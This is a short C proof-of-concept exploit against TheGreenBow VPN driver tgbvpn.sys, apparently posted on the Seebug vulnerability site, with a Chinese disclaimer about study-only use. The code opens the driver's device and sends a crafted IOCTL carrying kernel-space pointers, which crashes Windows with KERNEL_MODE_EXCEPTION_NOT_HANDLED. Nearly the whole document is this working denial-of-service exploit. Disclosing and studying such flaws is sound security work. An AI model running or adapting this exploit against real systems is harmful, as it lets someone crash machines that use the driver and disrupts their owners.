+--------------------------------------------------------------------------------------------+ /* tgbvpn.sys KERNEL_MODE_EXCEPTION_NOT_HANDLED - DoS PoC * * Author: Giuseppe 'Evilcry' Bonfa' * E-Mail: evilcry {AT} gmail. {DOT} com * Website: http://evilcry.netsons.org * http://evilcodecave.blogspot.com * http://evilcodecave.wordpress.com * http://evilfingers.com * http://malwareAnalytics.com [under construction] */ #include <windows.h> #include <stdio.h> #include <stdlib.h> int main(void) { HANDLE hDevice; DWORD Junk; system("cls"); printf("\n .:: TheGreenBow DoS Proof of Concept ::.\n"); hDevice = CreateFileA("\\\\.\\tgbvpn", 0, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("\n Unable to Device Driver\n"); return EXIT_FAILURE; } DeviceIoControl(hDevice, 0x80000034,(LPVOID) 0x80000001, 0, (LPVOID) 0x80000002, 0, &Junk, (LPOVERLAPPED)NULL); return EXIT_SUCCESS; }
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论